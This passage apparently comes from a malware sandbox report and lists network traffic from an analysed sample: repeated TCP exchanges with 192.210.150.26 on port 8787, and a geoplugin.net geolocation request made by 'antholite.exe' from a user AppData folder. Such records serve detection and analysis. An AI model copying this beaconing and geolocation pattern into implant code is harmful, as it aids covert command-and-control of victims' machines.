                        Sep 3, 2024 15:24:09.024410963 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024446964 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024460077 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024470091 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024477959 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024497986 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024511099 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024521112 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024522066 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024530888 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024559975 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024573088 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024584055 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024586916 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024600983 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024615049 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.024631023 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.024657011 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.024859905 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.024878979 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.024892092 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.024928093 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.024964094 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.024976969 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.024991989 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025006056 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025011063 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.025019884 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025032043 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025032997 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.025043964 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025057077 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025059938 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.025069952 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025079012 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.025096893 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025106907 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.025110960 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.025154114 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026103973 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026115894 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026191950 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026228905 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026242018 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026253939 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026258945 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026272058 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026302099 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026333094 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026345968 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026357889 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026375055 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026403904 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026464939 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026479006 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026490927 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026520014 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026599884 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026640892 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026654005 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026669025 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026669025 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026685953 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026695967 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026714087 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026730061 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.026731014 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.026777983 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.027051926 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027249098 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027261019 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027272940 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027287006 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027292013 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.027302027 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027318001 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027318001 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.027331114 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027344942 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.027347088 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027360916 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027381897 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027391911 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.027400970 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027414083 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.027415991 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027434111 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.027440071 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.027478933 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.028234005 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.028249025 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.028296947 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.385318041 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390283108 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390307903 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390328884 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390343904 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390358925 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390357971 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390374899 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390388012 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390391111 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390414953 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390436888 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390450001 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390463114 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390476942 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390484095 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390507936 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390580893 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390595913 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390608072 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390623093 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390623093 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390645981 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390656948 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390659094 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390698910 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390819073 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390831947 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390844107 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390856028 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390872002 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390872955 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390889883 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390893936 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390913010 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390927076 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390938997 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390939951 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390954971 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390960932 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390970945 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.390980005 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.390985966 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391016960 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391135931 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391146898 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391160011 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391174078 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391190052 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391191959 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391202927 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391211033 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391230106 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391235113 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391242981 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391258001 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391287088 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391324043 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391350031 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391364098 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391376019 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391390085 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391402006 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391417027 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391421080 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391436100 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391452074 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391453028 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391468048 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:09.391480923 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.391509056 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:09.441864014 CEST | 80 | 49706 | 178.237.33.50 | 192.168.2.5
                        Sep 3, 2024 15:24:09.441932917 CEST | 49706 | 80 | 192.168.2.5 | 178.237.33.50
                        Sep 3, 2024 15:24:11.741301060 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:12.042254925 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:12.651602030 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:12.680156946 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.680224895 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:12.680422068 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.680485010 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:12.680975914 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.680985928 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.681036949 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:12.681389093 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.681435108 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.681438923 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:12.681639910 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.681651115 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.681659937 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.681670904 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.681680918 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.681684971 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.685067892 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.685189962 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.685302973 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.685312033 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.685801983 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.685986996 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.686443090 CEST | 8787 | 49705 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:12.686530113 CEST | 49705 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:14.764683962 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:14.766375065 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:14.771343946 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:44.772291899 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:24:44.776555061 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:24:44.781502008 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:25:14.797111988 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:25:14.802134991 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:25:14.806967020 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:25:45.174824953 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:25:45.176368952 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:25:45.177789927 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:25:45.177840948 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:25:45.181448936 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:25:57.777126074 CEST | 49706 | 80 | 192.168.2.5 | 178.237.33.50
                        Sep 3, 2024 15:25:58.151664019 CEST | 49706 | 80 | 192.168.2.5 | 178.237.33.50
                        Sep 3, 2024 15:25:58.854808092 CEST | 49706 | 80 | 192.168.2.5 | 178.237.33.50
                        Sep 3, 2024 15:26:00.057934046 CEST | 49706 | 80 | 192.168.2.5 | 178.237.33.50
                        Sep 3, 2024 15:26:02.651652098 CEST | 49706 | 80 | 192.168.2.5 | 178.237.33.50
                        Sep 3, 2024 15:26:07.557917118 CEST | 49706 | 80 | 192.168.2.5 | 178.237.33.50
                        Sep 3, 2024 15:26:14.817228079 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:26:14.818553925 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:26:14.823473930 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:26:17.354789019 CEST | 49706 | 80 | 192.168.2.5 | 178.237.33.50
                        Sep 3, 2024 15:26:44.823299885 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:26:44.834172010 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:26:44.839157104 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:27:14.829685926 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:27:14.831681013 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:27:14.836883068 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:27:44.843878984 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Sep 3, 2024 15:27:44.848443031 CEST | 49704 | 8787 | 192.168.2.5 | 192.210.150.26
                        Sep 3, 2024 15:27:44.853349924 CEST | 8787 | 49704 | 192.210.150.26 | 192.168.2.5
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Sep 3, 2024 15:24:07.802879095 CEST | 55906 | 53 | 192.168.2.5 | 1.1.1.1
                        Sep 3, 2024 15:24:07.811259985 CEST | 53 | 55906 | 1.1.1.1 | 192.168.2.5
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Sep 3, 2024 15:24:07.802879095 CEST | 192.168.2.5 | 1.1.1.1 | 0xf40c | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Sep 3, 2024 15:24:07.811259985 CEST | 1.1.1.1 | 192.168.2.5 | 0xf40c | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                        • geoplugin.net
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49706 | 178.237.33.50 | 80 | 6364 | C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 15:24:07.821610928 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                        Sep 3, 2024 15:24:08.739424944 CEST | 1170 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 13:24:08 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                        Sep 3, 2024 15:24:08.739896059 CEST | 1170 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 13:24:08 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
